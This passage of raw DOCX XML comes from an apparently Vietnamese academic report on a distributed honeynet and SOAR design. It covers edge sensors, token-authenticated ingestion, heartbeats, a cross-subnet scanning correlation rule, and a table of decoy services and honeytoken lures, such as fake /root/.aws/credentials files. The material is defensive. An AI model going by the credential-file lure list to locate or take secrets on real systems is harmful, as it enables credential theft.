    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D4">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303520" cy="3447288"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="170158691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303520" cy="3447288"/>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3.4: Giao diện Thẻ cảnh báo và Bàn phím tương tác Inline Buttons của Telegram SOAR Bot</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D6">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3.9 Thiết kế Kiến trúc Mạng Bẫy Mồi Phân tán (Distributed Honeynet Architecture)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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môi trường hạ tầng mạng doanh nghiệp hiện đại hoặc mô hình điện toán đám mây lai (Hybrid Cloud), việc triển khai Honeypot đơn điểm (Single Honeypot Instance) bộc lộ hạn chế lớn về tầm nhìn chiến thuật (tactical visibility). Nếu chỉ đặt bẫy tại một địa chỉ IP duy nhất, hệ thống không thể giám sát được các kỹ thuật di chuyển ngang (Lateral Movement) hoặc hoạt động dò quét trinh sát phân tán (Cross-Subnet Probing). Nhằm khắc phục triệt để rào cản này, kiến trúc Honeynet Phân tán (Distributed Honeynet Architecture) được thiết kế và tích hợp trực tiếp vào nhân điều phối.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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Mô hình bao gồm các thành phần cốt lõi được chuẩn hóa theo chuẩn kiến trúc mở:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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Cụm Cảm biến Biên Đa phân vùng (Distributed Edge Sensor Nodes): Các tác tử cảm biến (Sensor Agents) được phân bổ tại các vị trí nhạy cảm trong hệ thống mạng, bao gồm phân vùng DMZ công khai, phân vùng Đám mây AWS VPC và phân vùng Mạng nội bộ Doanh nghiệp (Corporate LAN). Mỗi cảm biến được định danh duy nhất (node_id) và gán nhãn phân vùng mạng (subnet tag).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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Giao thức Truyền tin &amp; Xác thực Biên an toàn (Secure REST Ingestion Protocol): Toàn bộ dữ liệu nhật ký sự kiện và trạng thái sức khỏe từ các Cảm biến Biên được gửi về Máy chủ Thu thập Trung tâm (Collector Server) thông qua giao thức HTTPS REST API tại cổng 9090. Kênh giao tiếp được bảo vệ nghiêm ngặt bằng Header xác thực 'X-Honeynet-Token' với cơ chế so khớp băm an toàn hmac.compare_digest(), ngăn chặn hoàn toàn nguy cơ giả mạo cảm biến (Sensor Spoofing).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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Cơ chế Giám sát Sức khỏe &amp; Chống mất mát Dữ liệu (Heartbeat &amp; Resiliency): Các cảm biến duy trì nhịp tim (Heartbeat) định kỳ 30 giây gửi về Collector. Nếu một cảm biến mất kết nối quá thời gian quy định, hệ thống tự động ghi nhận trạng thái OFFLINE và gửi thông báo cảnh báo về SOC. Phía cảm biến hỗ trợ hàng đợi đệm (Event Buffer Queue) giúp lưu trữ tạm thời sự kiện khi mạng gián đoạn và tự động đồng bộ lại khi kết nối phục hồi.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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Thuật toán Tương quan Dò quét Xuyên Phân vùng (Cross-Subnet Probing Correlation): Khi một địa chỉ IP nguồn thực hiện dò quét hoặc tương tác với từ 2 phân vùng mạng khác nhau trở lên, Correlation Engine lập tức kích hoạt Luật tương quan đặc biệt 'ALT-DISTRIB' tương ứng với Kỹ thuật MITRE ATT&amp;CK T1046 (Network Service Discovery: Distributed Multi-Node Scanning), tự động cộng dồn +35 điểm rủi ro và kích hoạt Playbook ngăn chặn đồng loạt trên toàn bộ các tường lửa biên.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DD">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669280" cy="3472434"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1701586917"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669280" cy="3472434"/>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3.5: Sơ đồ Kiến trúc Mạng Bẫy Mồi Phân tán (Distributed Honeynet Cluster Architecture)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DF">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3.2: Danh mục Phân bổ Cảm biến Biên và Chiến lược Mồi nhử trong Cụm Honeynet Phân tán</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table9"/>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1881"/>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1881"/>
            <w:gridCol w:w="1881"/>
            <w:gridCol w:w="1881"/>
            <w:gridCol w:w="1881"/>
            <w:gridCol w:w="1881"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Mã Node Cảm biến</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E1">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Phân vùng Triển khai</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Dải mạng Subnet</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Dịch vụ Bẫy mồi Hoạt động</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Loại Mồi nhử Honeytoken</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">sensor-dmz-01</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E6">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">DMZ Public Web</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E7">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.10.0/24</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E8">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Cowrie SSH (Port 2222) + HTTP Canary (8080)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E9">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/root/.bash_history, db_backup.sql</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1EA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">sensor-cloud-aws-02</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EB">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">AWS Cloud VPC</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EC">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">10.0.1.0/24</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001ED">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Decoy SSH Shell + Fake Cloud Admin Portal</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EE">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/root/.aws/credentials (AWS Canary IAM)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">sensor-internal-lan-03</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F0">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Corporate Internal LAN</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F1">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">172.16.0.0/16</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F2">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Decoy Lateral Port + Fake SMB File Share</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F3">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Active Directory Decoy Admin SPN</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F4">
      <w:pPr>
        <w:spacing w:before="80" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table10"/>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0f4f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F5">
            <w:pPr>
              <w:spacing w:after="80" w:before="80" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="00468c"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">📌 GHI CHÚ HỌC THUẬT: ĐỘT PHÁ CỦA MÔ HÌNH HONEYNET PHÂN TÁN TRONG TÁC CHIẾN ACTIVE DEFENSE &amp; SOAR:</w:t>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="282828"/>
